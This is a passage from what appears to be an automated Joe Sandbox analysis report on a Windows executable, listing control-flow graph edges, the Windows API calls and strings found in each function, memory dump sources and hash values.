7ff6ceb3cbce-7ff6ceb3cbd6 919->923 924 7ff6ceb3cb75 919->924 922->894 923->894 926 7ff6ceb3cb7a-7ff6ceb3cb81 924->926 927 7ff6ceb3cbbd-7ff6ceb3cbc8 926->927 928 7ff6ceb3cb83-7ff6ceb3cb87 926->928 927->923 929 7ff6ceb3cb89-7ff6ceb3cb90 928->929 930 7ff6ceb3cba3 928->930 929->930 931 7ff6ceb3cb92-7ff6ceb3cb96 929->931 932 7ff6ceb3cba9-7ff6ceb3cbb9 930->932 931->930 934 7ff6ceb3cb98-7ff6ceb3cba1 931->934 932->926 933 7ff6ceb3cbbb 932->933 933->923 934->932
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                          • Instruction ID: efb6f6ed2211424daceca624dedc6d77575e84e19d9e85652432a7aa37beb0bd
                                                                                          • Opcode Fuzzy Hash: 08457a1c6721881f4c11fed91b7cfb17c1058ae71b93dddd692bbf3e619047ea
                                                                                          • Instruction Fuzzy Hash: 63C1053290C68783EB218F9492422BD3775EBA2B82F594131FACD97395DE7CF8458B50

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                          • String ID:
                                                                                          • API String ID: 995526605-0
                                                                                          • Opcode ID: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                          • Instruction ID: 0dc714b531f1ecb78981178c131d1bd1174109ab4c1cad25d4075d89d0aa5602
                                                                                          • Opcode Fuzzy Hash: b1216ed18347f8b81e820bbdb8b5f09e12cf3be39993a81172719e0d53531675
                                                                                          • Instruction Fuzzy Hash: 5E21553260C64282EB509F55F64413AA3B0FFA6BA1F101235FADD97BD8DF6CE4548B00

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6CEB28860: GetCurrentProcess.KERNEL32 ref: 00007FF6CEB28880
                                                                                            • Part of subcall function 00007FF6CEB28860: OpenProcessToken.ADVAPI32 ref: 00007FF6CEB28891
                                                                                            • Part of subcall function 00007FF6CEB28860: GetTokenInformation.KERNELBASE ref: 00007FF6CEB288B6
                                                                                            • Part of subcall function 00007FF6CEB28860: GetLastError.KERNEL32 ref: 00007FF6CEB288C0
                                                                                            • Part of subcall function 00007FF6CEB28860: GetTokenInformation.KERNELBASE ref: 00007FF6CEB28900
                                                                                            • Part of subcall function 00007FF6CEB28860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6CEB2891C
                                                                                            • Part of subcall function 00007FF6CEB28860: CloseHandle.KERNEL32 ref: 00007FF6CEB28934
                                                                                          • LocalFree.KERNEL32(00000000,00007FF6CEB23B4E), ref: 00007FF6CEB28C0C
                                                                                          • LocalFree.KERNEL32 ref: 00007FF6CEB28C15
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                          • API String ID: 6828938-1817031585
                                                                                          • Opcode ID: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                          • Instruction ID: 9fd03ac04c53144e3619b47a23a519036be5534145cd228762cc6ff4a288bad4
                                                                                          • Opcode Fuzzy Hash: b6111afcc3eeb0b408ea35522252114c0c7814765020da058c7306c730e1b11f
                                                                                          • Instruction Fuzzy Hash: E3216D32A1974781FA50AF20E6096F96270BF7A782F844532F9CDE7696DF3CE5058740

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(?,00007FF6CEB239CA), ref: 00007FF6CEB23F34
                                                                                            • Part of subcall function 00007FF6CEB229C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6CEB28AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB2101D), ref: 00007FF6CEB229F4
                                                                                            • Part of subcall function 00007FF6CEB229C0: MessageBoxW.USER32 ref: 00007FF6CEB22AD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastMessageModuleName
                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                          • API String ID: 2581892565-1977442011
                                                                                          • Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                          • Instruction ID: 60ca6e15ca3426de3bfa22099994752fb04d4dee1b218f9e701946b285c2f2fa
                                                                                          • Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
                                                                                          • Instruction Fuzzy Hash: 4E117521B1958341FA25AF21FA193F65274AF7A7C6F440832F8CEE7699EE1CE1458704
                                                                                          APIs
                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6CEB3DCFB), ref: 00007FF6CEB3DE2C
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6CEB3DCFB), ref: 00007FF6CEB3DEB7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleErrorLastMode
                                                                                          • String ID:
                                                                                          • API String ID: 953036326-0
                                                                                          • Opcode ID: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                          • Instruction ID: 454f21f9ec8000a06ff978de726e81e89b8adad053f60da8d6b01f1dadca36b7
                                                                                          • Opcode Fuzzy Hash: e5bc4118b78d7803f2849d3b40dbb6165d02ed41efd1a206ffcb3739746c0941
                                                                                          • Instruction Fuzzy Hash: E291E876F0865286F7508F65964127D2BB4BB62B8AF54413AFE8EF7A84CF38E441C700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _get_daylight$_isindst
                                                                                          • String ID:
                                                                                          • API String ID: 4170891091-0
                                                                                          • Opcode ID: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                          • Instruction ID: 9492486ef80cca67d5fd6870a678d1b0fd66d6dc918228d00fa4f2a19d2dd3c9
                                                                                          • Opcode Fuzzy Hash: a806384fd3dbc637569f566945d79e9d0f9a49a7dde5cce1babac435a7d8ed95
                                                                                          • Instruction Fuzzy Hash: 36510672F092128AEB14DF64DA856BC3771AB6135AF500136FE5EA3AE5DF3CA442C701
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 1279662727-0
                                                                                          • Opcode ID: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                                                          • Instruction ID: 0af7d0b262195b0aa8d05bf673186281d119a690477ec265c1d15c968ff36f26
                                                                                          • Opcode Fuzzy Hash: 2e3e6935fd272a0e473f5669fe72b613a847a441e18d85c9910f5be84e911a30
                                                                                          • Instruction Fuzzy Hash: 3341BD22E1878283E7148F2097413B96270FBA67A5F109335FADC93AD6DF7CA5E48700
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                          • String ID:
                                                                                          • API String ID: 3251591375-0
                                                                                          • Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                          • Instruction ID: 3df67e4bdbf5a1ecad684ebac4116086f9bc17feda80f3514d48262767852acf
                                                                                          • Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
                                                                                          • Instruction Fuzzy Hash: 73318D21E0C60342FA14AF64971A3B922B19F73786F554035FADEEB2E7DE2CF4058A51
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                          • Instruction ID: ec3d2d2d81f0f0e018d78010e9a567626e76b80674f49cbe2fb63f50b2d029bd
                                                                                          • Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
                                                                                          • Instruction Fuzzy Hash: 54D05E10F0830243FA047F701A8603812315F6AF03F101439E89BA3383CD3CB40E8600
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateDirectoryMessage
                                                                                          • String ID: Security descriptor is not initialized!
                                                                                          • API String ID: 73271072-986317556
                                                                                          • Opcode ID: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                                                          • Instruction ID: f5a6345016e23e35525a981e553574c1d159483e4c22b28b27818d9078251069
                                                                                          • Opcode Fuzzy Hash: cb4d7abd45f9f406bb8e9fa743bd3ea339ce9ab77a45f8f760c2574a3479da4c
                                                                                          • Instruction Fuzzy Hash: 3AE06DB2A18B4682EA609F24E90527922A0BB72765F800335F1CCE63E4DF3CD1098B00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                          • String ID:
                                                                                          • API String ID: 3215553584-0
                                                                                          • Opcode ID: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                          • Instruction ID: 6f3065bf7aeeac756b0df6027fbe2d76f84f7610c41aa3a4af083fb30bb0a52a
                                                                                          • Opcode Fuzzy Hash: 0eaa1c8d06bd359b1122625d16b3aa7d08c7f0865ba5f1d40f60a3f142269269
                                                                                          • Instruction Fuzzy Hash: CE512D21B0DA4147FA289E35961267A62B1BF62BA9F144730FDEDA77C5DE3CE4408600
                                                                                          APIs
                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6CEB3B78D,?,?,00000000,00007FF6CEB3B842), ref: 00007FF6CEB3B97E
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6CEB3B78D,?,?,00000000,00007FF6CEB3B842), ref: 00007FF6CEB3B988
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                                          • String ID:
                                                                                          • API String ID: 1687624791-0
                                                                                          • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                          • Instruction ID: d6b43d95577814e1622cfababa9a5afca08384912be31bbbeee8934fde2f78d2
                                                                                          • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                          • Instruction Fuzzy Hash: 2121FC32F0864342FE945F1196C227812A25FA2B95F040335F6DDE73C9CE2CEC454301
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastPointer
                                                                                          • String ID:
                                                                                          • API String ID: 2976181284-0
                                                                                          • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                          • Instruction ID: ffffdc3f24bdc3b69e9ed496a8f4da8d8f320e43432f7d21d4cd776b151a0a78
                                                                                          • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                          • Instruction Fuzzy Hash: FF11B266608A8182DA108F25A6051797371AB56BF5F544331FAFD977D9CF3CE0548B00
                                                                                          APIs
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB3875D), ref: 00007FF6CEB38903
                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CEB3875D), ref: 00007FF6CEB38919
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                          • String ID:
                                                                                          • API String ID: 1707611234-0
                                                                                          • Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                          • Instruction ID: 5466a3ee8ed81a1a7ff36f24d0d6c9737512c9c19cc6c9838b85d068c9c8f8c3
                                                                                          • Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                          • Instruction Fuzzy Hash: DD017C3290C25282E7609F14A50623AB3B1FB92B62F601336F6E9929D8DF7CE004DB01
                                                                                          APIs
                                                                                          • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B716
                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF6CEB43B72,?,?,?,00007FF6CEB43BAF,?,?,00000000,00007FF6CEB44075,?,?,00000000,00007FF6CEB43FA7), ref: 00007FF6CEB3B720
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                          • String ID:
                                                                                          • API String ID: 588628887-0
                                                                                          • Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                          • Instruction ID: 477548eee9d1e961f7a6625ea6bb7e4cd45a4d0cc92f7cedebe9138dc4296b7a
                                                                                          • Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                          • Instruction Fuzzy Hash: 97E08612F0D60283FF185FB156D607412718F76B52B440030F98DE7351DE2C68858640
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1863284450.00007FF6CEB20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863386681.00007FF6CEB4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863426290.00007FF6CEB61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1863486171.00007FF6CEB63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ff6ceb20000_TS-240605-Millenium1.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 2018770650-0
                                                                                          • Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                          • Instruction ID: a9e4acd93c040ba791b79048a858436860f12e0d66c7102407d09e53294eaf1e
                                                                                          • Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                          • Instruction Fuzzy Hash: 2FD01214F2951383FA242FB91E8603852B42F77B27F500732F0ADE22D0DE5CF0851602
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1863325719.00007FF6CEB21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6CEB20000, based on PE: true
